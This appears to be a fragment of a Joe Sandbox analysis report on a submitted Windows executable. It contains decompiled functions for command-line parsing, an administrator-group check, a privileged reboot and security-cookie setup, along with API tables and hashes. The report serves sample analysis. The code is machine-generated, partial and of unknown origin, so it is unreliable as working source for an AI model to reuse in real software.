                                                                                                                                                                                                                                              																	L50:
                                                                                                                                                                                                                                              																	_t173 = _v272;
                                                                                                                                                                                                                                              																	if( *_t173 != 0) {
                                                                                                                                                                                                                                              																		goto L2;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L106;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                                                              										_t209 = 0;
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L131;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *0x978a2c != 0 &&  *0x978b3e == 0) {
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x979a3c, 0x978b3e, 0x104) == 0) {
                                                                                                                                                                                                                                              							_t209 = 0;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t202 = 0x5c;
                                                                                                                                                                                                                                              							 *((char*)(E009766C8(0x978b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = _t209;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L131:
                                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                                              0x00975d4f
                                                                                                                                                                                                                                              0x00975d8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d93
                                                                                                                                                                                                                                              0x00975d93
                                                                                                                                                                                                                                              0x00975d9a
                                                                                                                                                                                                                                              0x00975d9d
                                                                                                                                                                                                                                              0x00975d9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d9e
                                                                                                                                                                                                                                              0x00975d51
                                                                                                                                                                                                                                              0x00975d5b
                                                                                                                                                                                                                                              0x00975d72
                                                                                                                                                                                                                                              0x009760fb
                                                                                                                                                                                                                                              0x009760fb
                                                                                                                                                                                                                                              0x00976207
                                                                                                                                                                                                                                              0x0097620a
                                                                                                                                                                                                                                              0x0097620b
                                                                                                                                                                                                                                              0x0097620e
                                                                                                                                                                                                                                              0x00976217
                                                                                                                                                                                                                                              0x00975d78
                                                                                                                                                                                                                                              0x00975d78
                                                                                                                                                                                                                                              0x00975d80
                                                                                                                                                                                                                                              0x00975d83
                                                                                                                                                                                                                                              0x00975d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d84
                                                                                                                                                                                                                                              0x00975d5d
                                                                                                                                                                                                                                              0x00975d5f
                                                                                                                                                                                                                                              0x00975d62
                                                                                                                                                                                                                                              0x00975d68
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d62
                                                                                                                                                                                                                                              0x00975d5b
                                                                                                                                                                                                                                              0x00975d4f
                                                                                                                                                                                                                                              0x00975d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d9f
                                                                                                                                                                                                                                              0x00975d9f
                                                                                                                                                                                                                                              0x00975da5
                                                                                                                                                                                                                                              0x00975dab
                                                                                                                                                                                                                                              0x00975dba
                                                                                                                                                                                                                                              0x00976218
                                                                                                                                                                                                                                              0x0097621d
                                                                                                                                                                                                                                              0x00976220
                                                                                                                                                                                                                                              0x00976221
                                                                                                                                                                                                                                              0x00976229
                                                                                                                                                                                                                                              0x00976230
                                                                                                                                                                                                                                              0x00976247
                                                                                                                                                                                                                                              0x0097626a
                                                                                                                                                                                                                                              0x00976272
                                                                                                                                                                                                                                              0x00976249
                                                                                                                                                                                                                                              0x00976255
                                                                                                                                                                                                                                              0x0097625f
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976284
                                                                                                                                                                                                                                              0x00975dc0
                                                                                                                                                                                                                                              0x00975dc0
                                                                                                                                                                                                                                              0x00975dca
                                                                                                                                                                                                                                              0x00975e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dcc
                                                                                                                                                                                                                                              0x00975dce
                                                                                                                                                                                                                                              0x00975e24
                                                                                                                                                                                                                                              0x00975e24
                                                                                                                                                                                                                                              0x00975e2c
                                                                                                                                                                                                                                              0x00975e47
                                                                                                                                                                                                                                              0x00975e4a
                                                                                                                                                                                                                                              0x009761d2
                                                                                                                                                                                                                                              0x009761e2
                                                                                                                                                                                                                                              0x009761e7
                                                                                                                                                                                                                                              0x009761ee
                                                                                                                                                                                                                                              0x009761f1
                                                                                                                                                                                                                                              0x009761f1
                                                                                                                                                                                                                                              0x009761f8
                                                                                                                                                                                                                                              0x009761f8
                                                                                                                                                                                                                                              0x00975e50
                                                                                                                                                                                                                                              0x00975e53
                                                                                                                                                                                                                                              0x00976109
                                                                                                                                                                                                                                              0x0097611f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976125
                                                                                                                                                                                                                                              0x00976137
                                                                                                                                                                                                                                              0x0097613a
                                                                                                                                                                                                                                              0x0097613c
                                                                                                                                                                                                                                              0x0097613e
                                                                                                                                                                                                                                              0x0097613e
                                                                                                                                                                                                                                              0x00976141
                                                                                                                                                                                                                                              0x00976141
                                                                                                                                                                                                                                              0x00976143
                                                                                                                                                                                                                                              0x00976144
                                                                                                                                                                                                                                              0x0097614a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976150
                                                                                                                                                                                                                                              0x00976152
                                                                                                                                                                                                                                              0x0097615c
                                                                                                                                                                                                                                              0x00976170
                                                                                                                                                                                                                                              0x00976172
                                                                                                                                                                                                                                              0x0097617c
                                                                                                                                                                                                                                              0x00976190
                                                                                                                                                                                                                                              0x00976190
                                                                                                                                                                                                                                              0x00976196
                                                                                                                                                                                                                                              0x009761a5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975edc
                                                                                                                                                                                                                                              0x00975edf
                                                                                                                                                                                                                                              0x00975eea
                                                                                                                                                                                                                                              0x00975eed
                                                                                                                                                                                                                                              0x00975f3f
                                                                                                                                                                                                                                              0x00975f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975eef
                                                                                                                                                                                                                                              0x00975eef
                                                                                                                                                                                                                                              0x00975ef2
                                                                                                                                                                                                                                              0x00975f34
                                                                                                                                                                                                                                              0x00975ef4
                                                                                                                                                                                                                                              0x00975ef4
                                                                                                                                                                                                                                              0x00975ef7
                                                                                                                                                                                                                                              0x00975f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ef9
                                                                                                                                                                                                                                              0x00975ef9
                                                                                                                                                                                                                                              0x00975efc
                                                                                                                                                                                                                                              0x00975f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975efe
                                                                                                                                                                                                                                              0x00975eff
                                                                                                                                                                                                                                              0x00975f02
                                                                                                                                                                                                                                              0x00975f16
                                                                                                                                                                                                                                              0x00975f04
                                                                                                                                                                                                                                              0x00975f07
                                                                                                                                                                                                                                              0x00975f0d
                                                                                                                                                                                                                                              0x00975f46
                                                                                                                                                                                                                                              0x00975f46
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f07
                                                                                                                                                                                                                                              0x00975f02
                                                                                                                                                                                                                                              0x00975efc
                                                                                                                                                                                                                                              0x00975ef7
                                                                                                                                                                                                                                              0x00975ef2
                                                                                                                                                                                                                                              0x00975f4c
                                                                                                                                                                                                                                              0x00975f4e
                                                                                                                                                                                                                                              0x00975f50
                                                                                                                                                                                                                                              0x00975f54
                                                                                                                                                                                                                                              0x00975ed4
                                                                                                                                                                                                                                              0x00975ea2
                                                                                                                                                                                                                                              0x00975ea4
                                                                                                                                                                                                                                              0x00975eaf
                                                                                                                                                                                                                                              0x00975eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e79
                                                                                                                                                                                                                                              0x00975e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e85
                                                                                                                                                                                                                                              0x00975e85
                                                                                                                                                                                                                                              0x00975e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e94
                                                                                                                                                                                                                                              0x00975e8e
                                                                                                                                                                                                                                              0x00975e7d
                                                                                                                                                                                                                                              0x00975e77
                                                                                                                                                                                                                                              0x00975e6e
                                                                                                                                                                                                                                              0x00975e65
                                                                                                                                                                                                                                              0x00975e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dce
                                                                                                                                                                                                                                              0x00975dca
                                                                                                                                                                                                                                              0x00975dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d00
                                                                                                                                                                                                                                              0x00975dd9
                                                                                                                                                                                                                                              0x00975e04
                                                                                                                                                                                                                                              0x009761fe
                                                                                                                                                                                                                                              0x00975e0a
                                                                                                                                                                                                                                              0x00975e0c
                                                                                                                                                                                                                                              0x00975e17
                                                                                                                                                                                                                                              0x00975e17
                                                                                                                                                                                                                                              0x00975e04
                                                                                                                                                                                                                                              0x00976200
                                                                                                                                                                                                                                              0x00976200
                                                                                                                                                                                                                                              0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00975CEE
• GetModuleFileNameA.KERNEL32(00978B3E,00000104,00000000,?,?), ref: 00975DFC
• CharUpperA.USER32(?), ref: 00975E3E
• CharUpperA.USER32(-00000052), ref: 00975EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00975F6F
• CharUpperA.USER32(?), ref: 00975FA7
• CharUpperA.USER32(-0000004E), ref: 00976008
• CharUpperA.USER32(?), ref: 009760AA
• CloseHandle.KERNEL32(00000000,00971140,00000000,00000040,00000000), ref: 009761F1
• ExitProcess.KERNEL32 ref: 009761F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: bc33ef48521189ff2bdb41954c7ef72e91cc321ef65d0a46eccb0e54d96102b2
• Instruction ID: d7a6d92cd57bc708e01a35a68c080af82d2366a94da3a701b43b5edd1dacad3e
• Opcode Fuzzy Hash: bc33ef48521189ff2bdb41954c7ef72e91cc321ef65d0a46eccb0e54d96102b2
• Instruction Fuzzy Hash: 45D15E73A48E445EDFB58B389C4C3FA3B69AB56304F55C4AAC4CED6191D6F48EC28B04
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
                                                                                                                                                                                                                                              			E009718A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                                                                                                              				_t49 = __edx;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                              				_t25 =  *0x978128; // 0x2
                                                                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t50 = 2;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if(_t25 != _t50) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					return E00976CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E009717EE( &_v20) != 0) {
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                                                                              						 *0x978128 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                                              					CloseHandle(_v28);
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                                                              					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_pop(_t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                                              						LocalFree(_t52);
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if( *_t52 <= 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							FreeSid(_v32);
                                                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                              						_t50 = _t15;
                                                                                                                                                                                                                                              						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                                                                              							_t50 = _t50 + 8;
                                                                                                                                                                                                                                              							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x978128 = 1;
                                                                                                                                                                                                                                              						_v20 = 1;
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x0097199c
                                                                                                                                                                                                                                              0x00971972
                                                                                                                                                                                                                                              0x00971972
                                                                                                                                                                                                                                              0x00971975
                                                                                                                                                                                                                                              0x00971984
                                                                                                                                                                                                                                              0x00971985
                                                                                                                                                                                                                                              0x0097198a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097198c
                                                                                                                                                                                                                                              0x00971991
                                                                                                                                                                                                                                              0x00971996
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971996
                                                                                                                                                                                                                                              0x0097194c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009718DD), ref: 0097181A
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0097182C
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: AllocateAndInitializeSid.ADVAPI32(009718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009718DD), ref: 00971855
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: FreeSid.ADVAPI32(?,?,?,?,009718DD), ref: 00971883
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: FreeLibrary.KERNEL32(00000000,?,?,?,009718DD), ref: 0097188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009718EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 009718F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0097190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00971918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 0097192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00971944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00971964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 0097197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 0097199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 009719A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009719AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 75f740de111c825b44fe972b366cd6216434fcc09fe5f5be1ae4f1c252c1083d
                                                                                                                                                                                                                                              • Instruction ID: 049e150928f4a72de258acdd968869e82c26ddcc12bf66d54691e8397ead23d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75f740de111c825b44fe972b366cd6216434fcc09fe5f5be1ae4f1c252c1083d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4313273A14209AFDB10DFA9EC59ABFBBBCFF45700F104825E649E2150E7309946DB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E00971F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0x979a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E009744B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E00976CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E009744B9(0, 0x522, 0x971140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E00971EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00971EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00971F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00971FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: e23733f61de665d2f839644c00b660b9ab240f6cbb7b625f2d86e5000da0a9e9
                                                                                                                                                                                                                                              • Instruction ID: 7caba7aa05e971f8a602842d2c49e711f0cbe7b2fb5d1fd4883e483653bc160c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e23733f61de665d2f839644c00b660b9ab240f6cbb7b625f2d86e5000da0a9e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E621F973B442057BEB205BA99C4AFBF77BCEBC6B11F108419FA0EE6181D7748841A261
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00977155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0x978004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x978004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0x978008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
